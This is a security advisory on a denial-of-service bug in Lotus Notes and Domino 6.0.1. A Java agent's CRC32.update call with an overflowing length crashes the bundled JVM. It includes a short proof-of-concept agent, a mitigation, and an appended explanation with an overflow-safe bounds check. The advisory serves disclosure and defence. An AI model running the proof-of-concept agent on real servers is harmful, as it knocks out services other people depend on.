COMMAND

Java Agent freezes Lotus Notes and Domino 6.0.1

SYSTEMS AFFECTED

Lotus Notes 6.0.1
Lotus Domino 6.0.1

PROBLEM

Marc Schoenefeld [schonef@uni-muenster.de] found the following:

The following agent causes the IBM JVM 1.3.1 shipped with Lotus Domino 6.0.1 and Lotus Notes 6.0.1 to crash. After the agent is called, a huge amount of memory is not freed, which causes the server machine (observed on MS XP) to deny further service.

IMPLICATIONS
============

- If the agent is run on the client, Lotus Notes 6.0.1 is vulnerable.
- If the agent is run on the server, Lotus Domino 6.0.1 is vulnerable.

ANALYSIS
========

The call to the "update" method of CRC32 causes an integer overflow in the Java java.util.zip.* core libraries, which triggers a JNI routine that cannot handle the extremely high input value.

HISTORY
=======

This vulnerability has already been detected in the Sun JDK (http://developer.java.sun.com/developer/bugParade/bugs/4811913.html), and was disclosed at Blackhat Windows 2003. The background of this bug is described at www.illegalaccess.org

AGENT
=====

    import lotus.domino.*;
    import java.util.zip.*;

    public class JavaAgent extends AgentBase {

        public void NotesMain() {
            try {
                Session session = getSession();
                AgentContext agentContext = session.getAgentContext();

                CRC32 crc32 = new CRC32();
                // Empty array with offset 4 and length 0x7ffffffc:
                // the call described under ANALYSIS.
                crc32.update(new byte[0], 4, 0x7ffffffc);

                // (Your code goes here)

            } catch(Exception e) {
                e.printStackTrace();
            }
        }
    }

SOLUTION

Don't allow agents on server.
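
The wrap-around behind the ANALYSIS section, as an added Java example that is not part of the advisory or of any JVM source: with offset 4 and length 0x7ffffffc, the sum wraps to a negative int, so a range check written as `off + len > b.length` accepts the call. That form of the check is an assumption (the advisory does not show the library's code), and `checkedUpdate` is a hypothetical wrapper that validates the range before `CRC32.update` is reached.

```java
import java.util.zip.CRC32;

// Added illustration; not code from the advisory or from any JVM source.
public class CrcBoundsCheck {

    // Assumed form of a naive range check: off + len is evaluated in
    // 32-bit int arithmetic and can wrap around to a negative value.
    static boolean naiveCheckAccepts(byte[] b, int off, int len) {
        return !(off < 0 || len < 0 || off + len > b.length);
    }

    // Overflow-safe form: off and len are never added. b.length - len
    // cannot overflow because both operands are non-negative here.
    static boolean safeCheckAccepts(byte[] b, int off, int len) {
        return !(off < 0 || len < 0 || off > b.length - len);
    }

    // Hypothetical wrapper: reject a bad range in Java code so that the
    // values never reach the native CRC routine.
    static void checkedUpdate(CRC32 crc, byte[] b, int off, int len) {
        if (b == null) {
            throw new NullPointerException("buffer is null");
        }
        if (!safeCheckAccepts(b, off, len)) {
            throw new ArrayIndexOutOfBoundsException(
                "off=" + off + " len=" + len + " length=" + b.length);
        }
        crc.update(b, off, len);
    }

    public static void main(String[] args) {
        byte[] empty = new byte[0];
        int off = 4, len = 0x7ffffffc;   // values from the advisory's agent

        System.out.println("off + len as int  = " + (off + len));
        System.out.println("off + len as long = " + ((long) off + len));
        System.out.println("naive accepts: " + naiveCheckAccepts(empty, off, len));
        System.out.println("safe accepts:  " + safeCheckAccepts(empty, off, len));

        CRC32 crc = new CRC32();
        byte[] data = "constructed sample".getBytes();
        checkedUpdate(crc, data, 0, data.length);      // valid range
        System.out.println("crc32 = " + Long.toHexString(crc.getValue()));
        try {
            checkedUpdate(crc, empty, off, len);       // rejected before native code
        } catch (ArrayIndexOutOfBoundsException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```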